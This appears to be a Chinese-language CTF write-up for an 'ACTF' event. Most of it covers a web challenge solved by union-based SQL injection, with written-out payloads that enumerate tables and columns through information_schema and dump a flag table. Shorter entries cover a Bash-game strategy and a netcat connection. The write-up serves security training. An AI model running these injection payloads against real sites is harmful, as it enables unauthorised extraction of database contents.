ACTF

web

easyeasySQL

由题意sql注入题型，先输入1试试

再加个单引号

页面无回显，再尝试构造1' --（注意有个空格)，提交之后回显又出来了
然后利用order by判断列数，3正常，4无回显，说明有3列
构造0' union select 1,2,3--尝试联合查询

联合查询可以用，然后看表名：0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--

目标锁定f1Ag表，构造：0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="f1Ag"--

已知列名表名接下来看具体内容了：0' union select 1,2,group_concat(flag) from f1Ag--

成功拿到flag

另外，这道题布尔盲注也可以，这里不多叙述，看几张图即可

由于不会脚本，用的bp进行爆破

最后ascii码转字符即可

linkgame

查看源码即可

crypto

miaomiaomiao

签到题，下载附件，用idle打开即可

reverse

How2Reverse

下载附件，用ida打开，搜索actf即可

misc

签到

复制粘贴即可

纳什均衡

连接上之后是一个游戏，需要连赢5局才能拿到flag，参考攻略如下：
显然，如果n=m+1，那么由于一次最多只能取m个，所以，无论先取者拿走多少个，后取者都能够一次拿走剩余的物品，后者取胜。因此我们发现了如何取胜的法则：如果n=（m+1）r+s，（r为任意自然数，s≤m),那么先取者要拿走s个物品，如果后取者拿走k（≤m)个，那么先取者再拿走m+1-k个，结果剩下（m+1）（r-1）个，以后保持这样的取法，那么先取者肯定获胜。总之，要保持给对手留下（m+1）的倍数，就能最后获胜。
即，若n=k*(m+1)，则后取着胜，反之，存在先取者获胜的取法。n%(m+1)==0. 先取者必败。
奇异局势的判定

pwn

test_your_nc

签到题，打开kali用netcat命令连接上，ls查看目录，cat打开文件